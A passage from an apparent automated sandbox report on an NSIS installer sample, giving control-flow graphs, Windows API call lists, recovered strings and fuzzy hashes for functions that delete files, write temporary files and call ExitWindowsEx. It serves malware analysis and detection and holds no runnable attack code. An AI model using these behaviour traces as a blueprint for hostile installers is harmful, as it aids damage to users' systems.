call 407cb6 * 2 81->89 90 40462f-404634 81->90 89->59 90->64 109 404961-40498f 92->109 110 404944-40495d ExitWindowsEx 92->110 93->92 98 4048a1-4048c3 GetCurrentProcess 93->98 95->96 96->90 106 4046ce-4046d7 96->106 98->92 113 4048c5-404930 98->113 111 4046e0 call 40774b 106->111 112 4046d9-4046de call 4076b0 106->112 109->110 114 404991-40499d call 403903 109->114 110->114 115 40495f 110->115 123 4046e5-4046fb SetCurrentDirectoryA 111->123 112->123 113->92 114->69 115->69 124 404713-404735 call 407cb6 123->124 125 4046fd-404712 call 407cb6 123->125 131 40473e-404767 call 407e06 DeleteFileA 124->131 125->124 134 404769-40478b CopyFileA 131->134 135 4047dd-4047e4 131->135 134->135 136 40478d-4047cf call 408311 call 407e06 call 407779 134->136 135->131 137 4047ea-404800 call 408311 135->137 136->135 146 4047d1-4047dc CloseHandle 136->146 137->64 146->135
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32 ref: 00404388
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 0040438F
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32 ref: 004043CC
                                                                                                                                                                                                                                                              • InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
                                                                                                                                                                                                                                                              • OleInitialize.OLE32 ref: 00404405
                                                                                                                                                                                                                                                              • SHGetFileInfoA.SHELL32 ref: 0040443A
                                                                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404478
                                                                                                                                                                                                                                                              • CharNextA.USER32 ref: 004044B1
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000001,00000001), ref: 0040456F
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32 ref: 0040458D
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32 ref: 004045B6
                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 0040481C
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004049AC
                                                                                                                                                                                                                                                                • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,00000000), ref: 004048A1
                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32 ref: 00404953
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 004060FD: lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                                                • Part of subcall function 004060FD: GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CharExitHandleModuleNextProcessWindows$AddressAttributesCommandCommonControlsCurrentDeleteDirectoryErrorInfoInitInitializeLineModePathProcTempUninitializeVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID: /D=$ _?=$"C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe" $%$($Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$UXTHEME$Lq
                                                                                                                                                                                                                                                              • API String ID: 3796326152-3942272051
                                                                                                                                                                                                                                                              • Opcode ID: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                                                                                                                                                              • Instruction ID: 1612ab991b91f7509b6110098b19e500dbf275244ae378e5724325f5e1753ea3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F143F0908300AFD720AF65D94876BBBE4EF85704F41887EE5C8A7291D77C58458B6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004085B8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 298 4085b8-4085d4 call 40815b 301 4085f3-408601 298->301 302 4085d6-4085ee DeleteFileA 298->302 304 408603-408605 301->304 305 408615-40862e call 407cb6 301->305 303 40883e-408845 302->303 306 408824-40882a 304->306 307 40860b-40860f 304->307 312 408630-408646 call 407ce8 305->312 313 408648-408650 call 4078ce 305->313 306->303 307->305 309 4087cd-4087d8 call 408123 307->309 309->303 317 4087da-4087f8 call 407cf2 call 407a46 RemoveDirectoryA 309->317 321 408651-408654 312->321 313->321 334 4087fa-4087fe 317->334 335 40882c-408837 call 406fcb 317->335 323 408656-40865d 321->323 324 40865f-408670 call 407ce8 321->324 323->324 325 408671-4086a1 lstrlenA FindFirstFileA 323->325 324->325 329 4087b6-4087bd 325->329 330 4086a7-4086c2 call 4078a4 325->330 329->303 332 4087bf-4087cb 329->332 340 4086d2-4086d7 330->340 341 4086c4-4086d0 330->341 332->306 332->309 334->306 338 408800-408822 call 406fcb call 408311 334->338 342 40883c-40883d 335->342 338->342 340->341 345 4086d9 340->345 344 4086dc-4086df 341->344 342->303 347 4086e1-4086e6 344->347 348 4086fb-408716 call 407cb6 344->348 345->344 350 4086ec-4086ef 347->350 351 40878f-4087a6 FindNextFileA 347->351 356 408734-408749 call 407a46 DeleteFileA 348->356 357 408718-408721 348->357 350->348 355 4086f1-4086f5 350->355 351->330 354 4087ac-4087b5 FindClose 351->354 354->329 355->348 355->351 363 40874b-40874f 356->363 364 40877d-408788 call 406fcb 356->364 357->351 358 408723-408732 call 4085b8 357->358 366 40878d-40878e 358->366 367 408751-408773 call 406fcb call 408311 363->367 368 408775-40877b 363->368 364->366 366->351 367->366 368->351
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32 ref: 004085D9
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32 ref: 00408694
                                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileFind$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                                              • API String ID: 3200608346-1684325040
                                                                                                                                                                                                                                                              • Opcode ID: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
                                                                                                                                                                                                                                                              • Instruction ID: 15a94c35718d9934db7cd19974bec7e4185b96846047f3cacb9e12796964f464
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E7175B0908344AED720AF25CE4576EBBF8AF45714F45887EE8C5A7381CB3D8844CB5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00408123 Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                                              • Opcode ID: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
                                                                                                                                                                                                                                                              • Instruction ID: 11fd5c66118aeed7f08c7c2f326ea88146cd1b5fc0ef80ef14f89fbd5f6a2284
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20E0ECB5704204AFD700BFB89C4841B7AE9AB94714B84C929B9A5CB390D634C85287AA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004060FD Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 253registrystringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 147 4060fd-40611a call 408299 150 406136-406176 call 407b3a 147->150 151 40611c-406131 call 407be3 147->151 156 4061a7-4061b6 call 407ce8 150->156 157 406178-4061a4 call 407b3a 150->157 161 4061bb-4061e8 call 404ae0 call 40815b 151->161 156->161 157->156 167 4062be-4062cd call 40815b 161->167 168 4061ee-4061f3 161->168 173 4062e7-406329 LoadImageA 167->173 174 4062cf-4062e6 call 407e06 167->174 168->167 169 4061f9-406232 call 407b3a 168->169 169->167 179 406238-40623f 169->179 177 406405-40640c call 403903 173->177 178 40632f-40636b RegisterClassA 173->178 174->173 188 406411-406416 177->188 181 406374-406400 SystemParametersInfoA CreateWindowExA 178->181 182 40636d-40636f 178->182 184 406241-40625c call 4078a4 179->184 185 40625f-40626e call 407cde 179->185 181->177 187 40654e-406556 182->187 184->185 194 406270-406285 lstrcmpiA 185->194 195 4062a3-4062bd call 407cf2 call 407cb6 185->195 191 40653a-40653f 188->191 192 40641c-406428 call 404ae0 188->192 191->187 203 406513-406522 call 404c0d 192->203 204 40642e-406455 ShowWindow call 40820e 192->204 194->195 197 406287-406294 GetFileAttributesA 194->197 195->167 200 406296-406298 197->200 201 40629a-4062a2 call 4078ce 197->201 200->195 200->201 201->195 215 406541-406548 call 403903 203->215 216 406524-40652b 203->216 213 406464-406488 GetClassInfoA 204->213 214 406457-406463 call 40820e 204->214 219 40648a-4064bd GetClassInfoA RegisterClassA 213->219 220 4064be-406511 DialogBoxParamA call 403903 call 4049b4 213->220 214->213 223 40654d 215->223 216->191 221 40652d-406539 call 403903 216->221 219->220 220->223 221->191 223->187
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                                                • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                                              • LoadImageA.USER32(?,?,00000000,00000000), ref: 00406317
                                                                                                                                                                                                                                                              • RegisterClassA.USER32 ref: 00406361
                                                                                                                                                                                                                                                              • SystemParametersInfoA.USER32 ref: 00406392
                                                                                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 004063F7
                                                                                                                                                                                                                                                              • ShowWindow.USER32 ref: 0040643E
                                                                                                                                                                                                                                                              • GetClassInfoA.USER32(?,00000000), ref: 00406481
                                                                                                                                                                                                                                                              • GetClassInfoA.USER32 ref: 004064A1
                                                                                                                                                                                                                                                              • RegisterClassA.USER32 ref: 004064B7
                                                                                                                                                                                                                                                              • DialogBoxParamA.USER32 ref: 004064ED
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcmpiwsprintf
                                                                                                                                                                                                                                                              • String ID: _Nb$g$hWq$Lq
                                                                                                                                                                                                                                                              • API String ID: 3995538257-4203105860
                                                                                                                                                                                                                                                              • Opcode ID: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                                                                                                                                                              • Instruction ID: 933614cd0025173359140365b9e7a590c615df7829bf1f80af9a09b402b61920
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75B10AB05083019FE710AF65D94872BBBE4EF44308F41892EE4D597391D7BC9895CB9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403F03 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 216memoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 230 403f03-403f6d GetTickCount GetModuleFileNameA call 407a78 233 4042b1-4042b8 230->233 234 403f73-403fc4 call 407cb6 call 4078ce call 407cb6 GetFileSize 230->234 241 403fce-403fd0 234->241 242 4040c3-4040d6 call 4039fe 241->242 243 403fd6-403ffb call 403ae9 241->243 250 4040d8 242->250 251 40412d-40413a 242->251 246 404000-404004 243->246 248 404006-404012 call 4039fe 246->248 249 404017-40401e 246->249 255 404168-40416d 248->255 256 404024-404050 call 407a23 249->256 257 4040ed-4040f1 249->257 250->255 252 404172-4041f0 GlobalAlloc call 408904 call 407ad4 CreateFileA 251->252 253 40413c-404144 call 403b31 251->253 252->233 278 4041f6-40424b call 403b31 call 403d52 252->278 267 404149-40415e call 403ae9 253->267 255->233 262 4040ff-404105 256->262 271 404056-404060 256->271 261 4040f3-4040fa call 4039fe 257->261 257->262 261->262 265 404120-404128 262->265 266 404107-40411e call 408898 262->266 265->241 266->265 267->255 280 404160-404166 267->280 271->262 275 404066-404070 271->275 275->262 279 404076-404080 275->279 287 404250-404259 278->287 279->262 282 404082-40408c 279->282 280->252 280->255 282->262 284 40408e-4040b1 282->284 284->255 286 4040b7-4040bb 284->286 288 4040dd-4040eb 286->288 289 4040bd-4040c1 286->289 287->255 290 40425f-404273 287->290 288->262 289->242 289->288 291 404275 290->291 292 40427b 290->292 291->292 293 404280-404281 292->293 294 404283-404287 293->294 295 404289-4042ae call 407a23 293->295 294->293 295->233
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403F0F
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32 ref: 00403F36
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 004078CE: lstrlenA.KERNEL32 ref: 004078DB
                                                                                                                                                                                                                                                                • Part of subcall function 004078CE: CharPrevA.USER32 ref: 004078F0
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,75923160), ref: 00403FB5
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 00404183
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,00000000), ref: 004041DC
                                                                                                                                                                                                                                                                • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • soft, xrefs: 00404076
                                                                                                                                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004041EB
                                                                                                                                                                                                                                                              • @, xrefs: 00404294
                                                                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00404168
                                                                                                                                                                                                                                                              • Inst, xrefs: 00404066
                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00403F68
                                                                                                                                                                                                                                                              • Null, xrefs: 00404082
                                                                                                                                                                                                                                                              • Lq, xrefs: 00404266
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Create$AllocAttributesCharCountDestroyGlobalModuleNamePrevReadSizeTickWindowlstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID: @$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$Lq
                                                                                                                                                                                                                                                              • API String ID: 3119619987-954420035
                                                                                                                                                                                                                                                              • Opcode ID: 86ceb0f55910d5bee0ed91d50a485dda6c60a6ff79fcc7ad8f2db1f11ee4e7d1
                                                                                                                                                                                                                                                              • Instruction ID: b38f96b7e78b57fcd3b2806388120572df800b880dbb1f433db2e5bcd9a6e09c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86ceb0f55910d5bee0ed91d50a485dda6c60a6ff79fcc7ad8f2db1f11ee4e7d1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1791A4B09083048FD720AF29D98576EBBF4EF84318F41847EE584A7291D77C9985CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403D52 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 373 403d52-403d60 374 403d92-403da3 call 403b63 373->374 375 403d62-403d8f SetFilePointer 373->375 378 403ef7-403f00 374->378 379 403da9-403ddc ReadFile 374->379 375->374 380 403de2-403de6 379->380 381 403ea8-403ead 379->381 380->381 382 403dec-403e05 call 403b63 380->382 381->378 382->378 385 403e0b-403e0f 382->385 386 403e15-403e18 385->386 387 403eba-403eec ReadFile 385->387 388 403e64-403e69 386->388 387->381 389 403eee-403ef1 387->389 390 403eb6-403eb8 388->390 391 403e6b-403ea2 ReadFile 388->391 389->378 390->378 391->381 392 403e1a-403e1d 391->392 392->381 393 403e23-403e4f WriteFile 392->393 394 403e51-403e54 393->394 395 403eaf-403eb4 393->395 394->395 396 403e56-403e62 394->396 395->378 396->388
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
